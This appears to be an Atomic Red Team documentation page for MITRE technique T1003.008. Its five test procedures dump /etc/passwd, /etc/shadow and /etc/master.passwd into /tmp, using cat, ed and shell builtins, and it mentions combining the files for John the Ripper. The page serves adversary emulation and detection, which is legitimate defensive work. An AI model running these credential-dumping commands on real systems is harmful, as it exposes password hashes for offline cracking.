Ctrl+K

T1003.008 - /etc/passwd and /etc/shadow

T1003.008 - /etc/passwd and /etc/shadow#

Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)

The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db

Atomic Tests#

Atomic Test #1 - Access /etc/shadow (Local)/etc/shadow file is accessed in Linux environments#

Supported Platforms: linux Elevation Required (e.g. root or admin)#### Attack Commands: Run with bash

sudo cat /etc/shadow > /tmp/T1003.008.txt
cat /tmp/T1003.008.txt

Invoke-AtomicTest T1003.008 -TestNumbers 1

Cleanup:#

rm -f /tmp/T1003.008.txt

Invoke-AtomicTest T1003.008 -TestNumbers 1 -Cleanup

Atomic Test #2 - Access /etc/master.passwd (Local)/etc/master.passwd file is accessed in FreeBSD environments#

Supported Platforms: linux Elevation Required (e.g. root or admin)#### Attack Commands: Run with sh

sudo cat /etc/master.passwd > /tmp/T1003.008.txt
cat /tmp/T1003.008.txt

Invoke-AtomicTest T1003.008 -TestNumbers 2

Cleanup:#

rm -f /tmp/T1003.008.txt

Invoke-AtomicTest T1003.008 -TestNumbers 2 -Cleanup

Atomic Test #3 - Access /etc/passwd (Local)/etc/passwd file is accessed in FreeBSD and Linux environments#

Supported Platforms: linux#### Attack Commands: Run with sh

cat /etc/passwd > /tmp/T1003.008.txt
cat /tmp/T1003.008.txt

Invoke-AtomicTest T1003.008 -TestNumbers 3

Cleanup:#

rm -f /tmp/T1003.008.txt

Invoke-AtomicTest T1003.008 -TestNumbers 3 -Cleanup

Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that’s not catDump /etc/passwd, /etc/master.passwd and /etc/shadow using ed#

Supported Platforms: linux Elevation Required (e.g. root or admin)#### Attack Commands: Run with sh

unamestr=$(uname)
if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > ${output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > ${output_file}; fi

Invoke-AtomicTest T1003.008 -TestNumbers 4

Cleanup:#

rm -f /tmp/T1003.008.txt

Invoke-AtomicTest T1003.008 -TestNumbers 4 -Cleanup

Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtinsDump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins#

Supported Platforms: linux Elevation Required (e.g. root or admin)#### Attack Commands: Run with sh

testcat(){ (while read line; do echo $line >> /tmp/T1003.008.txt; done < $1) }
[ "$(uname)" = 'FreeBSD' ] && testcat /etc/master.passwd
testcat /etc/passwd
testcat /etc/shadow

Invoke-AtomicTest T1003.008 -TestNumbers 5

Cleanup:#

rm -f /tmp/T1003.008.txt

Invoke-AtomicTest T1003.008 -TestNumbers 5 -Cleanup

Detection#

The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.

Contents